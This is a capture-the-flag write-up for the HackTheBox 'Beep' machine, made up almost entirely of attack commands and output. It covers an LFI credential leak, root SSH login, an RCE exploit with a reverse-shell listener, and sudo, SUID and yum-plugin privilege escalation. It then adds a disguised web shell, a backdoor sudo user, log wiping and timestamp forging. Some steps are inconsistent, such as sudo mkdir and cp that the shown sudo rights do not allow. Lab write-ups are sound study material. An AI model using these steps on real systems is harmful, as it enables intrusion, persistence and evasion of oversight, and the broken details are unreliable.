HackTheBox Beep
Writeup for HackTheBox Beep
HackTheBox Beep
Machine Synopsis
Key Exploitation Techniques:
- Elastix/FreePBX Local File Inclusion (LFI) vulnerability
- Remote Code Execution (CVE-2012-4856) via VoIP extension enumeration
- SSH authentication bypass with legacy algorithms
- Multiple privilege escalation vectors (sudo nmap, chmod abuse)
Reconnaissance & Enumeration
Port Discovery
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ nmap -p- --min-rate 10000 10.10.10.7
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
80/tcp open http
110/tcp open pop3
111/tcp open rpcbind
143/tcp open imap
443/tcp open https
993/tcp open imaps
995/tcp open pop3s
3306/tcp open mysql
4190/tcp open sieve
4445/tcp open upnotifyp
4559/tcp open hylafax
5038/tcp open asterisk
10000/tcp open snet-sensor-mgmt
Service Enumeration
1
2
3
4
5
6
7
8
9
10
11
12
$ nmap -p 22,25,80,110,143,443,3306,5038,10000 -sC -sV 10.10.10.7
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
25/tcp open smtp Postfix smtpd
80/tcp open http Apache httpd 2.2.3
|_http-title: Did not follow redirect to https://10.10.10.7/
443/tcp open ssl/http Apache httpd 2.2.3 ((CentOS))
|_http-title: Elastix - Login page
| ssl-cert: Subject: commonName=localhost.localdomain
3306/tcp open mysql MySQL (unauthorized)
5038/tcp open asterisk Asterisk Call Manager 1.1
10000/tcp open http MiniServ 1.570 (Webmin httpd)
Web Application Analysis
1
2
3
4
5
6
7
8
9
# Main site redirects to HTTPS
$ curl -k https://10.10.10.7/
# Elastix login page discovered
# Directory enumeration
$ gobuster dir -u https://10.10.10.7 -w /usr/share/wordlists/dirb/common.txt -k
/admin (Status: 301) [Size: 309] [--> https://10.10.10.7/admin/]
/configs (Status: 301) [Size: 311] [--> https://10.10.10.7/configs/]
/vtigercrm (Status: 301) [Size: 313] [--> https://10.10.10.7/vtigercrm/]
Exploitation
Method 1: Local File Inclusion (LFI)
Vulnerability Discovery
1
2
3
4
5
6
# Version identification through /admin directory
# Clicking "Cancel" on admin login reveals version: Elastix FreePBX 2.10.0
$ searchsploit elastix
Elastix 2.2.0 - 'graph.php' Local File Inclusion | php/webapps/37637.pl
FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution | php/webapps/18650.py
LFI Exploitation
1
2
3
4
5
6
7
8
# Exploit URL structure
$ curl -k "https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action"
# Extract credentials from amportal.conf
AMPDBUSER=asteriskuser
AMPDBPASS=jEhdIekWmdjE
AMPMGRUSER=admin
AMPMGRPASS=jEhdIekWmdjE
SSH Access via Credential Reuse
1
2
3
4
5
6
7
8
9
10
11
12
# SSH requires legacy algorithm support
$ ssh root@10.10.10.7 -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-dss
root@10.10.10.7's password: jEhdIekWmdjE
[root@beep ~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
[root@beep ~]# cat /root/root.txt
d7aa9cd47efa9b103e8f0274b11c00e3
[root@beep ~]# cat /home/fanis/user.txt
3ef574d538895f20a84739bddd0a7c9f
Method 2: Remote Code Execution
VoIP Extension Enumeration
1
2
3
4
5
6
7
# Install SIPVicious for VoIP enumeration
$ svwar -m INVITE -e100-999 10.10.10.7 2>/dev/null
+-----------+----------------+
| Extension | Authentication |
+===========+================+
| 233 | reqauth |
+-----------+----------------+
SSL/TLS Configuration Issues
1
2
3
4
5
6
7
8
9
10
11
12
13
14
# Check SSL/TLS support
$ sslscan 10.10.10.7:443
SSL/TLS Protocols:
SSLv2 disabled
SSLv3 enabled
TLSv1.0 enabled
TLSv1.1 disabled
TLSv1.2 disabled
# Modify OpenSSL configuration
$ sudo nano /etc/ssl/openssl.cnf
[system_default_sect]
MinProtocol = None
CipherString = DEFAULT
RCE Exploitation
1
2
3
4
5
6
7
# Download and execute FreePBX RCE exploit
$ searchsploit -m 18650
$ python 18650.py
# Configure: rhost="10.10.10.7", lhost="10.10.14.3", extension="233"
# Setup listener and trigger exploit
$ nc -nlvp 443
Alternative Privilege Escalation (from asterisk user)
Sudo Analysis
1
2
3
4
5
6
7
8
bash-3.2$ sudo -l
User asterisk may run the following commands on this host:
(root) NOPASSWD: /sbin/shutdown
(root) NOPASSWD: /usr/bin/nmap
(root) NOPASSWD: /usr/bin/yum
(root) NOPASSWD: /bin/touch
(root) NOPASSWD: /bin/chmod
(root) NOPASSWD: /bin/chown
Nmap Interactive Mode Exploitation
1
2
3
4
5
6
bash-3.2$ sudo nmap --interactive
Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
whoami
root
chmod/chown Privilege Escalation
1
2
3
4
5
# Make /bin/bash SUID
bash-3.2$ sudo chmod u+s /bin/bash
bash-3.2$ /bin/bash -p
bash-3.2# whoami
root
Post-Exploitation Techniques
Persistence Methods
SSH Key Installation
1
2
3
4
5
6
7
8
9
10
# Generate SSH key pair
$ ssh-keygen -t rsa -b 2048 -f beep_key
# Install public key
[root@beep ~]# mkdir -p /root/.ssh
[root@beep ~]# echo "ssh-rsa AAAAB3NzaC1yc2E..." >> /root/.ssh/authorized_keys
[root@beep ~]# chmod 600 /root/.ssh/authorized_keys
# Test SSH access
$ ssh -i beep_key root@10.10.10.7
Backdoor User Account
1
2
3
4
# Create backdoor user with root privileges
[root@beep ~]# useradd -m -s /bin/bash -G wheel backup
[root@beep ~]# echo 'backup:password123' | chpasswd
[root@beep ~]# echo "backup ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers
Web Shell Installation
1
2
3
4
5
6
7
8
9
10
11
12
13
# Install web shell in web directory
[root@beep ~]# cat > /var/www/html/cache.php << 'EOF'
<?php
if(isset($_GET['cmd'])) {
system($_GET['cmd']);
} else {
header('Content-Type: text/html');
echo '<!-- Cache File -->';
}
?>
EOF
# Access via: https://10.10.10.7/cache.php?cmd=id
Defense Evasion
Log Cleanup
1
2
3
4
5
6
7
8
9
10
11
12
13
14
# Clear system logs
[root@beep ~]# echo > /var/log/secure
[root@beep ~]# echo > /var/log/messages
[root@beep ~]# echo > /var/log/httpd/access_log
[root@beep ~]# echo > /var/log/httpd/error_log
# Clear Asterisk logs
[root@beep ~]# echo > /var/log/asterisk/messages
[root@beep ~]# echo > /var/log/asterisk/queue_log
# Clear bash history
[root@beep ~]# history -c
[root@beep ~]# echo > /root/.bash_history
[root@beep ~]# unset HISTFILE
File Timestamp Manipulation
1
2
3
# Match timestamps to system files
[root@beep ~]# touch -r /bin/bash /var/www/html/cache.php
[root@beep ~]# touch -r /etc/passwd /root/.ssh/authorized_keys
Lateral Movement Preparation
Network Discovery
1
2
3
4
5
# Discover network hosts
[root@beep ~]# nmap -sn 10.10.10.0/24
# Service enumeration
[root@beep ~]# nmap -sS -A 10.10.10.1-254
Database Access
1
2
3
4
5
6
7
8
9
10
11
12
13
# Access MySQL with discovered credentials
[root@beep ~]# mysql -u asteriskuser -pjEhdIekWmdjE
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| asterisk |
| asteriskcdrdb |
+--------------------+
mysql> use asterisk;
mysql> show tables;
mysql> select * from ampusers;
Elastix Configuration Analysis
1
2
3
4
5
6
# Examine Elastix configuration files
[root@beep ~]# cat /etc/elastix.conf
[root@beep ~]# find /var/www/html -name "*.conf" -exec grep -l "password" {} \;
# Check FreePBX database for additional credentials
[root@beep ~]# grep -r "password" /var/www/html/admin/
Alternative Exploitation Methods
Webmin Exploitation (Port 10000)
1
2
3
4
5
6
# Webmin version detection and exploitation
$ curl -k https://10.10.10.7:10000
# Test for default credentials: admin:admin, root:password
# Check for Webmin vulnerabilities
$ searchsploit webmin 1.570
Asterisk Manager Interface
1
2
3
4
5
6
7
8
9
10
# Connect to Asterisk Manager Interface
$ telnet 10.10.10.7 5038
Asterisk Call Manager/1.1
Action: Login
Username: admin
Secret: jEhdIekWmdjE
# Execute system commands if enabled
Action: Command
Command: core show version
Email Service Exploitation
1
2
3
4
5
6
7
8
9
10
# SMTP enumeration
$ smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t 10.10.10.7
# POP3/IMAP access with discovered credentials
$ telnet 10.10.10.7 110
+OK Cyrus POP3 server ready
USER admin
+OK Name is a valid mailbox
PASS jEhdIekWmdjE
+OK Maildrop ready
yum Plugin Privilege Escalation
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# Create malicious yum plugin
bash-3.2$ cat > /tmp/malicious.py << 'EOF'
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE
requires_api_version = '2.1'
plugin_type = (TYPE_CORE,)
def config_hook(conduit):
os.system('/bin/bash')
EOF
# Install plugin and trigger
bash-3.2$ sudo mkdir -p /usr/lib/yum-plugins/
bash-3.2$ sudo cp /tmp/malicious.py /usr/lib/yum-plugins/
bash-3.2$ sudo yum list
This post is licensed under CC BY 4.0 by the author.